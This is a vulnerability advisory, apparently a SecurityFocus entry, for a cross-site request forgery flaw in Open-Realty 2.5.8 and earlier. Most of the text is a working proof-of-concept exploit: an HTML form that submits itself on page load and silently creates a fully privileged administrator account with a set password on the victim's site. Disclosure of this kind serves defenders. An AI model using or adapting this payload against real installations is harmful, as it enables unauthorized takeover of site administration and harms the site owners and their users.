source: https://www.securityfocus.com/bid/56580/info
Open-Realty is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions and gain access to the affected application. Other attacks are also possible.
Open-Realty 2.5.8 and prior versions are vulnerable; other versions may also be affected.
<!-- Add Admin User -->
<form
action="http://localhost/orealty/admin/index.php?action=user_manager"
method="POST">
<input type="hidden" name="action" value="createNewUser" />
<input type="hidden" name="edit_user_name" value="user" />
<input type="hidden" name="edit_user_pass"
value="pa55w0rd" />
<input type="hidden" name="edit_user_pass2"
value="pa55w0rd" />
<input type="hidden" name="user_first_name" value="hacker"
/>
<input type="hidden" name="user_last_name" value="smith"
/>
<input type="hidden" name="user_email"
value="hacker@yehg.net" />
<input type="hidden" name="edit_active" value="yes" />
<input type="hidden" name="edit_isAdmin" value="yes" />
<input type="hidden" name="edit_isAgent" value="yes" />
<input type="hidden" name="limitListings" value="-1" />
<input type="hidden" name="edit_limitFeaturedListings"
value="-1" />
<input type="hidden" name="edit_userRank" value="0" />
<input type="hidden" name="edit_canEditAllListings"
value="yes" />
<input type="hidden" name="edit_canEditAllUsers" value="yes"
/>
<input type="hidden" name="edit_canEditSiteConfig" value="yes"
/>
<input type="hidden" name="edit_canEditMemberTemplate"
value="yes" />
<input type="hidden" name="edit_canEditAgentTemplate"
value="yes" />
<input type="hidden" name="edit_canEditPropertyClasses"
value="yes" />
<input type="hidden" name="edit_canEditListingTemplate"
value="yes" />
<input type="hidden" name="edit_canViewLogs" value="yes" />
<input type="hidden" name="edit_canModerate" value="yes" />
<input type="hidden" name="edit_canFeatureListings"
value="yes" />
<input type="hidden" name="edit_canEditListingExpiration"
value="yes" />
<input type="hidden" name="edit_canExportListings" value="no"
/>
<input type="hidden" name="edit_canPages" value="yes" />
<input type="hidden" name="edit_canVtour" value="yes" />
<input type="hidden" name="edit_canFiles" value="yes" />
<input type="hidden" name="edit_canUserFiles" value="yes" />
<input type="hidden" name="edit_canManageAddons" value="yes"
/>
<script>document.forms[0].submit()</script>
</form>